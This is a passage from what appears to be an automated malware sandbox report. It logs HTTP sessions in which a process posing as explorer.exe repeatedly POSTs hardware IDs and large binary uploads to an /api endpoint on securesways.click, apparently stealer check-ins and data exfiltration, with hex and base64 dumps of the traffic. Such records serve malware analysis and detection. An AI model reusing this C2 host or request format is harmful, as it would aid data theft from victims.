                                                                                                                                                                                                                                              Data Ascii: PdkCiGJwdeU956wOInfE0FdUHEoq0dkJxAqs8G7Trnk8/DOVYnFA+b3XnEIiHogob1ysam+JqcjxTrWpQ4ZLJTz8Y5Vicaj55cdIFnoLzT1bcH1XEtFc9LUG0JVT97MdXIT7lC8pCKWxk9guDmo1BTo9bR86mO2J/XZtoG+2S3zYhQLNAhBd3L2C9Xs/MsBME3QoDn7NXQxhUriFL68WIT3ZAqkCEfHlmdeYXmYajBlbkR1WEtDE9CkGqKFz6w8
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 70 6b 66 69 65 7a 68 69 66 62 45 49 68 49 75 30 45 51 44 41 52 52 32 66 37 6e 4e 44 41 57 6d 6f 49 46 7a 32 31 59 45 70 47 45 44 72 51 4e 4d 46 59 56 59 79 74 55 61 77 78 66 4d 5a 56 6f 4e 4a 49 4a 2f 36 5a 33 6f 70 55 2b 6b 4f 65 4e 62 6f 78 53 4d 2f 46 65 63 30 32 31 55 6f 5a 48 2f 78 52 73 48 4c 74 55 46 4f 69 30 64 56 6d 4f 55 70 4a 57 38 51 2f 33 4d 49 75 34 4c 56 45 48 59 5a 35 52 61 63 48 57 73 68 4d 75 39 47 31 38 76 30 41 67 54 4a 44 78 61 4b 39 79 35 44 41 57 57 71 49 56 72 36 77 70 41 41 42 6a 36 77 41 39 4a 4c 50 6e 6c 6a 76 55 6a 50 68 50 4e 5a 4c 35 74 42 56 61 4f 36 4b 57 56 2f 47 75 51 54 57 4f 4c 63 67 42 6b 70 54 59 49 4f 32 30 51 76 66 32 58 79 52 73 48 4c 74 55 46 4f 69 55 64 56 6d 4f 55 70 4a 57 38 51 2f 33 4d 49 75 34 4c 56 45 48 59
                                                                                                                                                                                                                                              Data Ascii: pkfiezhifbEIhIu0EQDARR2f7nNDAWmoIFz21YEpGEDrQNMFYVYytUawxfMZVoNJIJ/6Z3opU+kOeNboxSM/Fec021UoZH/xRsHLtUFOi0dVmOUpJW8Q/3MIu4LVEHYZ5RacHWshMu9G18v0AgTJDxaK9y5DAWWqIVr6wpAABj6wA9JLPnljvUjPhPNZL5tBVaO6KWV/GuQTWOLcgBkpTYIO20Qvf2XyRsHLtUFOiUdVmOUpJW8Q/3MIu4LVEHY
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 6d 51 7a 66 33 2f 79 41 63 32 72 74 42 63 56 6d 30 64 56 6b 4c 51 78 50 54 35 49 74 43 74 55 36 35 36 41 46 54 39 41 36 30 44 53 42 57 45 76 63 2f 63 57 67 6f 53 30 54 52 44 56 42 31 57 44 75 6e 41 39 4b 51 4c 38 64 52 57 73 77 4d 64 58 65 45 65 6d 45 73 35 44 4f 6e 6c 78 75 6a 69 78 70 71 45 47 42 74 68 4c 4a 4a 48 77 66 32 67 38 55 71 4d 59 5a 63 48 41 67 42 38 37 51 70 51 57 33 30 55 33 61 44 4b 7a 52 70 66 4c 36 30 45 37 79 51 34 46 6e 37 51 6e 50 54 4d 43 2f 47 5a 57 2f 74 57 58 44 48 51 48 76 77 65 63 57 6e 64 32 4d 75 74 47 31 39 6a 39 51 51 53 62 55 56 58 62 2b 6d 52 38 50 45 79 6e 4e 45 6e 71 30 5a 45 4d 66 7a 36 62 4c 63 35 43 4b 57 77 77 7a 41 75 4c 6e 61 59 43 42 74 77 33 4b 37 48 6d 62 6d 30 38 41 49 67 68 56 75 44 73 75 54 67 70 42 37 56 43
                                                                                                                                                                                                                                              Data Ascii: mQzf3/yAc2rtBcVm0dVkLQxPT5ItCtU656AFT9A60DSBWEvc/cWgoS0TRDVB1WDunA9KQL8dRWswMdXeEemEs5DOnlxujixpqEGBthLJJHwf2g8UqMYZcHAgB87QpQW30U3aDKzRpfL60E7yQ4Fn7QnPTMC/GZW/tWXDHQHvwecWnd2MutG19j9QQSbUVXb+mR8PEynNEnq0ZEMfz6bLc5CKWwwzAuLnaYCBtw3K7Hmbm08AIghVuDsuTgpB7VC


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.549821104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 14:00:00 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=WJQPB7AN
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 12770
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 14:00:00 UTC12770OUTData Raw: 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 57 4a 51 50 42 37 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                                                                                                                              Data Ascii: --WJQPB7ANContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--WJQPB7ANContent-Disposition: form-data; name="pid"2--WJQPB7ANContent-Disposition: form-data; name="lid"AB15g1----WJQPB7ANContent-Disposition:
                                                                                                                                                                                                                                              2024-12-21 14:00:02 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 14:00:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ra5mu2upjt6a80hreecp9nc9e3; expires=Wed, 16 Apr 2025 07:46:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2e0BDzW0CBecxqnOd7hDG9GnKPIBlACGGi5KLlz4sfGsu56pMXn8JgkURMwkca3EiSEJr%2BmYCvo6Rvpq3X3GXfpn61%2Bl2l4GmXGIiAPWmKyZ%2Fsg0BynINCdMMOxdT2G8C8HZBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58655dfc398ce0-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=1950&rtt_var=781&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13701&delivery_rate=1497435&cwnd=211&unsent_bytes=0&cid=eea858fd3c84c347&ts=1403&x=0"
                                                                                                                                                                                                                                              2024-12-21 14:00:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-21 14:00:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.549832104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 14:00:03 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=TIKP9HLMGXUP
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 15036
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 14:00:03 UTC15036OUTData Raw: 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                                                                              Data Ascii: --TIKP9HLMGXUPContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--TIKP9HLMGXUPContent-Disposition: form-data; name="pid"2--TIKP9HLMGXUPContent-Disposition: form-data; name="lid"AB15g1----TIKP9HLMGXUPConte
                                                                                                                                                                                                                                              2024-12-21 14:00:04 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 14:00:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=d23iejeer635cfnj17rp82j1qm; expires=Wed, 16 Apr 2025 07:46:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FwbkyMqJ9APOPm4BjAG09aiHw0B6U0GNiy5mG6v4Wemm5uY1JnfZs%2FM8CKWKD3tWvq0J6OQVDz5vf15HySiMMTjWy9Vti8DmGiCp1LXWToZMxyEF1LgyFoAxC6ksVFXQBBTH7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58656f8c0f7293-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1918&rtt_var=742&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15971&delivery_rate=1451292&cwnd=158&unsent_bytes=0&cid=58d311fbcabb65d4&ts=956&x=0"
                                                                                                                                                                                                                                              2024-12-21 14:00:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-21 14:00:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.549838104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 14:00:06 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=9SYU6HZEH96
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 20520
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 14:00:06 UTC15331OUTData Raw: 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                              Data Ascii: --9SYU6HZEH96Content-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--9SYU6HZEH96Content-Disposition: form-data; name="pid"3--9SYU6HZEH96Content-Disposition: form-data; name="lid"AB15g1----9SYU6HZEH96Content-D
                                                                                                                                                                                                                                              2024-12-21 14:00:06 UTC5189OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: un 4F([:7s~X`nO`i
                                                                                                                                                                                                                                              2024-12-21 14:00:09 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 14:00:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=fad41fbiqgok33lvr5rqqcovid; expires=Wed, 16 Apr 2025 07:46:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRgwTfKLxPXJkG2VHe%2BG3%2F5JJ6uR1EKQzQsGmIZgQJbf%2FSalgPqgb0xaSydegNE9a%2BrlpS4I1ENPnSxAAJHsv4XC09Ems1151QVOqLwDdZ70DujuWYsJO0Bz158FxGl5nTVLOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58657eee9e1881-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1557&rtt_var=593&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21476&delivery_rate=1829573&cwnd=238&unsent_bytes=0&cid=678628c1e4c94ca7&ts=3299&x=0"
                                                                                                                                                                                                                                              2024-12-21 14:00:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-21 14:00:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              8192.168.2.549849104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 14:00:11 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=7UT9CMYTEQ8VRR08WF
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 1237
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 14:00:11 UTC1237OUTData Raw: 2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 37
                                                                                                                                                                                                                                              Data Ascii: --7UT9CMYTEQ8VRR08WFContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--7UT9CMYTEQ8VRR08WFContent-Disposition: form-data; name="pid"1--7UT9CMYTEQ8VRR08WFContent-Disposition: form-data; name="lid"AB15g1----7
                                                                                                                                                                                                                                              2024-12-21 14:00:12 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 14:00:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=og5vn6rd7k1cfk2n2aum6hlgra; expires=Wed, 16 Apr 2025 07:46:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iG00IzgWchaI998c2rAZxlgXEqfKDA16aODhI1TKYFk3GqQCo1275QsGeD%2BmCxWDjW7hzyV5XY%2B9v%2Bh%2F%2F5u9yVzZSkA0QcrO455DvQDKF0NkXG9sPgxc5b6kbU9DNz%2FispY%2BMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58659e6d000fa8-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1448&rtt_var=561&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2155&delivery_rate=1917268&cwnd=252&unsent_bytes=0&cid=0750b254bb77b8da&ts=1207&x=0"
                                                                                                                                                                                                                                              2024-12-21 14:00:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-21 14:00:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              9192.168.2.549855104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=LNMEBUH85CDZUNVO0JV
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 403646
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 2d 2d 4c 4e 4d 45 42 55 48 38 35 43 44 5a 55 4e 56 4f 30 4a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 4e 4d 45 42 55 48 38 35 43 44 5a 55 4e 56 4f 30 4a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4e 4d 45 42 55 48 38 35 43 44 5a 55 4e 56 4f 30 4a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: --LNMEBUH85CDZUNVO0JVContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--LNMEBUH85CDZUNVO0JVContent-Disposition: form-data; name="pid"1--LNMEBUH85CDZUNVO0JVContent-Disposition: form-data; name="lid"AB15g1--
                                                                                                                                                                                                                                              2024-12-21 14:00:13 UTC15331OUTData Raw: 5b f6 ed 9d 64 74 8a 0a ac 93 e8 60 46 d4 b7 34 51 c2 31 f6 dc 42 15 76 7b a0 68 4a 90 ed 2a 6d 8a dd 0f 92 61 5e ca 03 f0 08 ac 80 88 ab fc 29 3e ba 03 09 f3 8d 40 c4 d0 a1 20 6f 4e 2f 93 d0 e8 f5 ce 6c e6 6d 54 93 46 6c 5f 33 2b ad d6 2e 6d ee 8f c8 a0 8a 93 68 ab ce 8b ec 57 16 2e 39 19 be 6b ba 58 97 18 e8 d4 28 56 a0 b7 32 2c 8b 4b 38 7e 2c a5 04 f7 f9 4e 9b ef 61 f9 a4 47 de 55 9e ba 7e 30 b2 08 1c 7f 95 77 68 46 90 2b 74 f3 0a f7 9d 1a a1 b8 97 78 5a 1f e7 3b 4c 76 f5 41 a5 a2 d4 57 d5 b3 68 c8 04 46 f4 d8 f5 8e 91 1a e8 ad ab 7c be a7 f4 07 92 fc e9 a3 51 6c 97 71 7e 19 b7 d3 c5 35 43 d8 c8 ef 1e 67 41 fd 49 ee b7 19 d7 b5 0b 88 4c e4 22 f7 1a 73 0a ad 86 cf 4d ef 43 3f 13 b2 2c 9e fa 4b 3c 6d 11 73 30 1c 1a 32 5d 3a e7 7c db 07 d0 58 c2 35 5b fc
                                                                                                                                                                                                                                              Data Ascii: [dt`F4Q1Bv{hJ*ma^)>@ oN/lmTFl_3+.mhW.9kX(V2,K8~,NaGU~0whF+txZ;LvAWhF|Qlq~5CgAIL"sMC?,K<ms02]:|X5[
